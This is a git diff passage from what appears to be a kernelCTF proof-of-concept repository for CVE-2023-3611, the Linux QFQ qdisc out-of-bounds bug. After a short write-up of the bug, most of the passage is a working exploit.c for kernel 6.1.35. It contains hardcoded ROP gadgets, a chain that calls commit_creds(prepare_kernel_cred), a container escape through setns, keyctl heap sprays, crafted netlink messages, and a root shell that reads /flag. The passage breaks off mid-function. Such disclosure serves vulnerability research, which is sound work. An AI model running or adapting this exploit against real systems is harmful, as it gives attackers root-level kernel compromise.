virtually any size using such a table. + +`qfq_init_agg()` will then set `new_agg->lmax` accordingly. +Eventually `qfq_add_to_agg()` will initialize `new_agg->grp` when the call tree reaches `qfq_update_agg()`: + +```c +// qfq_update_agg() in net/sched/sch_qfq.c + agg->budgetmax = new_num_classes * agg->lmax; + new_agg_weight = agg->class_weight * new_num_classes; + agg->inv_w = ONE_FP/new_agg_weight; + + if (agg->grp == NULL) { + int i = qfq_calc_index(agg->inv_w, agg->budgetmax, + q->min_slot_shift); + agg->grp = &q->groups[i]; + } +``` + +`qfq_calc_index()` performs some simple arithmetics to choose the final value, but will not do any additional bounds checks. Eventually this results in `agg->grp` pointing out-of-bounds relative to the `q` object of type `struct qfq_sched` (in the kmalloc-8192 cache). + +The group of the qfq_aggregate is used in several places, leading to OOB reads and writes. diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile new file mode 100644 index 00000000..a590ce1c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit new file mode 100755 index 00000000..5896d4f5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c new file mode 100644 index 00000000..02adc6cf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/lts-6.1.35/exploit.c @@ -0,0 +1,1646 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { + +u64 cls_rsvp_ops = 0xffffffff8395e320; + +u64 find_task_by_vpid = 0xffffffff811b5670; +u64 switch_task_namespaces = 0xffffffff811bd1f0; +u64 commit_creds = 0xffffffff811bed80; +u64 prepare_kernel_cred = 0xffffffff811bf020; +u64 init_task = 0xffffffff83615a40; +u64 init_nsproxy = 0xffffffff836765c0; + +u64 ___trampoline_start_iretq = 0xffffffff822010c6; + +u64 mov_rdi_rax = 0xffffffff810eb083; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff810271ec; // pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8100256c; // pop rsi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff81002cd5; // pop rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5fe97e094001c3 + +u64 mov_rax_rdi_jmp_zen_ret = 0xffffffff810fdd45; // mov rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889f8e991414001c3 + +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff8198915b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 +u64 pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret = 0xffffffff810e8603; // pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5c4883c4185b5d415ce94f4d3c01c3 +u64 mov_rsp_rbp_pop_rbp_ret = 0xffffffff8112cf2c; // mov rsp, rbp; pop rbp; ret // 4889ec5dc3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(cls_rsvp_ops); \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(___trampoline_start_iretq); \ + x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(mov_rax_rdi_jmp_zen_ret); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret); \ + x(mov_rsp_rbp_pop_rbp_ret); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. +#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SPRAY_8192 1 +#define SPRAY_128 2 + +#define SIZEOF_USER_KEY_PAYLOAD 24 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct qfq_aggregate_partial { + // struct hlist_node next; /* 0 16 */ + // u64 S; /* 16 8 */ + u64 F; /* 24 8 */ + struct qfq_group * grp; /* 32 8 */ + u32 class_weight; /* 40 4 */ + int lmax; /* 44 4 */ + u32 inv_w; /* 48 4 */ + u32 budgetmax; /* 52 4 */ + u32 initial_budget; /* 56 4 */ + u32 budget; /* 60 4 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + int num_classes; /* 64 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + struct list_head active; /* 72 16 */ + struct hlist_node nonfull_next; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 100, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct qfq_aggregate_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD); + +struct tcf_proto_partial { + // void* next; /* 0 8 */ + // void * root; /* 8 8 */ + // int (*classify)(struct sk_buff *, const struct tcf_proto *, struct tcf_result *); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + struct tcf_chain * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD); + + +struct tcf_proto_ops { + struct list_head head; /* 0 16 */ + char kind[16]; /* 16 16 */ + int (*classify)(void*, const void*, void*); /* 32 8 */ + int (*init)(void*); /* 40 8 */ + void (*destroy)(void*, u8, void*); /* 48 8 */ + void * (*get)(void*, u32); /* 56 8 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + void (*put)(void*, void *); /* 64 8 */ + int (*change)(void*, void*, void*, long unsigned int, u32, void**, void **, u32, void*); /* 72 8 */ + int (*delete)(void*, void*, u8*, u8, void*); /* 80 8 */ + u8 (*delete_empty)(void*); /* 88 8 */ + void (*walk)(void*, void*, u8); /* 96 8 */ + int (*reoffload)(void*, u8, void *, void *, void*); /* 104 8 */ + void (*hw_add)(void*, void *); /* 112 8 */ + void (*hw_del)(void*, void *); /* 120 8 */ + /* --- cacheline 2 boundary (128 bytes) --- */ + void (*bind_class)(void *, u32, long unsigned int, void *, long unsigned int); /* 128 8 */ + void * (*tmplt_create)(void*, void*, void**, void*); /* 136 8 */ + void (*tmplt_destroy)(void *); /* 144 8 */ + int (*dump)(void*, void*, void *, void*, void*, u8); /* 152 8 */ + int (*terse_dump)(void*, void*, void *, void*, void*, u8); /* 160 8 */ + int (*tmplt_dump)(void*, void*, void *); /* 168 8 */ + struct module * owner; /* 176 8 */ + int flags; /* 184 4 */ + + /* size: 192, cachelines: 3, members: 22 */ + /* padding: 4 */ +} PACK; + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +typedef i32 key_serial_t; + +struct key { + key_serial_t id; + int type; +}; + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5); + +struct rop_payload_head { + struct tcf_proto_ops ops; + u8 stack[0]; +} PACK; + +// Large spray payload (kmalloc-8192) +// This will host the fake qfq_group object in stage 1 +// Eventually it will contain both the prepared stack and the tcf_proto_ops +// which the fake tcf_proto will reference +struct key_payload_large { + struct { + u8 __pad02[288 - SIZEOF_USER_KEY_PAYLOAD]; + struct qfq_group group; + } PACK; + struct rop_payload_head rop; + u8 __pad2[4097 - sizeof(struct qfq_group) - 288 - sizeof(struct rop_payload_head)]; +} PACK; +_Static_assert(sizeof(struct key_payload_large) == 4097 - SIZEOF_USER_KEY_PAYLOAD); +_Static_assert(__builtin_offsetof(struct key_payload_large, group) == 0x108); + +// Small spray payload (104 bytes) +// Used for fake qfq_aggregate as well as fake tcf_proto +// In the case of tcf_proto, we overlay the structure with +// a temporary stack from which we will eventually pivot into +// the larger stack prepared in the larger payload. +// The stack is carefully crafted to not interfere with the rest +// of the structure. +struct key_payload_small { + union { + struct qfq_aggregate_partial agg; + union { + struct tcf_proto_partial tp; + struct { + // payload for pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; ret + u8 __pad0[0x18 - SIZEOF_USER_KEY_PAYLOAD]; + u64 scratch_rbx; + u64 rbp; + u64 scratch_r12; + u64 stack[1]; + } PACK; + struct { + // payload for push rsi; jmp qword ptr [rsi+0x39] + u8 __pad1[0x39 - SIZEOF_USER_KEY_PAYLOAD]; + u64 jmp_target; + } PACK; + }; + }; +} PACK; +_Static_assert(sizeof(struct key_payload_small) == 104 - SIZEOF_USER_KEY_PAYLOAD); + +// key_ctl will be a bit sketchy because of our multi - process exploit. +// These functions will proxy calls through to a child process which possesses +// all the keys. +int spray(int type, int n, void* payload, size_t plen); +int spray_reset(); +int spray_reset_except(struct key* ids, size_t num_ids); +int spray_exit(); + +const struct key* get_key(unsigned index); + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +int final_stage_pid = 0; +void* final_stage_stack = NULL; + +static struct key_payload_small agg; // SPRAY_128 +static struct key_payload_large large; // SPRAY_8192 +static key_serial_t id_agg; +static key_serial_t id_large; + +static u64 leak_agg_ptr = 0; +static u64 leak_grp_ptr = 0; +static u64 leak_cls_rsvp_ops = 0; + +static u8* rop_payload = NULL; +static u32 rop_payload_size = 0; + +static u8* scratch_buf = NULL; + +#ifndef DO_BEFORE +#define DO_BEFORE 1 +#endif + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif +#ifndef ATTEMPT_SMALL_EVERY +#define ATTEMPT_SMALL_EVERY 27 +#endif + +static char* shell_argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, +}; + +void shell() { + L("escape .."); + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + execve(shell_argv[0], shell_argv, NULL); + exit(1); +} + +void prep_agg_payload(struct qfq_aggregate_partial* agg, u64 marker, u32 lmax) { + memset(agg, 0, sizeof(*agg)); + + agg->F = marker; // marker, dont-care + agg->grp = NULL; + agg->class_weight = 1; + agg->lmax = lmax; + agg->inv_w = 0; // dont-care + agg->budgetmax = 0; // dont-care + agg->initial_budget = 0; // dont-care + agg->budget = 0; // dont-care + agg->num_classes = 0; // so that we will free this on class deletion + + // iff we add a new class for this fake agg, keeping this NULL should be fine. + // otherwise we would have to pass the following in qfq_add_to_agg: + // + // if (cl->qdisc->q.qlen > 0) { /* adding an active class */ + // list_add_tail(&cl->alist, &agg->active); + // if (list_first_entry(&agg->active, struct qfq_class, alist) == + // cl && q->in_serv_agg != agg) /* agg was inactive */ + // qfq_activate_agg(q, agg, enqueue); /* schedule agg */ + // } + // + // this seems complicated, so we just avoid it. + agg->active.next = NULL; + agg->active.prev = NULL; + + // this should be the first agg in list, thus keeping those NULL should be fine. + // we need to pass this list op in qfq_find_agg: + // + // hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + // if (agg->lmax == lmax && agg->class_weight == weight) + // return agg; + // + agg->nonfull_next.next = NULL; + agg->nonfull_next.pprev = NULL; +} + +void prep_tcf_proto_payload(struct key_payload_small* p) { + memset(p, 0, sizeof(*p)); + + p->tp.protocol = 0xdead; + p->tp.prio = 0x22220000; + p->tp.ops = (void*)(leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.ops) + SIZEOF_USER_KEY_PAYLOAD); + + // interleaved stack, pivot to larger stack in 8192 buffer + p->rbp = (leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.stack) + SIZEOF_USER_KEY_PAYLOAD); + p->stack[0] = mov_rsp_rbp_pop_rbp_ret; + + // first pivot to the interleaved stack + p->jmp_target = pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret; + + // This refcount is on top of one of our gadgets. It will be incremented on trigger + p->tp.refcnt -= 1; +} + +void prep_stage1_large_payload(struct key_payload_large* large) { + memset(large, 0, sizeof(*large)); + + // This index will control the bit we flip. + // (offsetof(struct qfq_sch, nonfull_aggs) - offsetof(struct qfq_sch, bitmaps)) * 8 + (FFS(0x80) = 7) + large->group.index = 7440 * 8 + 7; +} + +void prep_final_large_payload(struct key_payload_large* large) { + memset(large, 0, sizeof(*large)); + + u64 cs; + u64 ss; + asm( + "movq %%cs, %0;" + "movq %%ss, %1;" + : "=r"(cs), "=r"(ss) + ); + + u8 rop[] = { + pad8('R'), // rbp + p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + p64(___trampoline_start_iretq), + + pad8('A'), // rax; + pad8('I'), // rdi; + + p64((u64)&shell), + p64(cs), + p64(0), // flags + p64((u64)(scratch_buf + 0x4000)), // rsp + p64(ss), + }; + + strcpy(large->rop.ops.kind, "exploit"); + large->rop.ops.get = (void*)mov_rax_rdi_jmp_zen_ret; + large->rop.ops.dump = (void*)push_rsi_jmp_rsi_0x39; + + memcpy(large->rop.stack, rop, sizeof(rop)); +} + +int read_key(key_serial_t id, void* buf, u32 buflen) { + if (scratch_buf == NULL) { + return -1; + } + + int keylen = keyctl(KEYCTL_READ, id, (unsigned long)scratch_buf, 0x10000, 0); + if (keylen < 0) { + return keylen; + } + + memcpy(buf, scratch_buf, buflen < keylen ? buflen : keylen); + + return keylen; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; + } + + E("worker %d does not exist?", index); + return -1; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +volatile int wake = 0; +volatile int done = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); +// event which will be set whenever control is handed over back to the final stage worker +static EVENT_DEFINE(final_worker_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = 0x1000; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object +int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + // this limit is important: + // we want the first packet to be delayed indefinitely, but + // the second packet, which triggers the vuln, to be dropped. + netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle, int with_stab) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + if (with_stab) { + // Prepare the sizetable. This sizetable is used to trigger + // the vulnerability. + // Essentially we setup a lookup table where the resulting + // packet size equals to (table[in_size >> 9] << 7) + // We choose those bitshifts to have some room for packet headers + // that we do not have to care about. + attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + sizespec->cell_log = 9; + sizespec->size_log = 7; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = 2; + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + 2 * sizeof(u16); + attr->nla_len += nested->nla_len; + + *((u16*)((void*)nested + NLA_HDRLEN) + 0) = 0; + // This is the size that triggers the vulnerability + *((u16*)((void*)nested + NLA_HDRLEN) + 1) = LMAX >> 7; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Delete a class from a qdisc +int delete_class(int s, int ifindex, u32 handle) { + L("deleting class %x", handle); + + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_DELTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to delete class!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + NLA_HDRLEN + 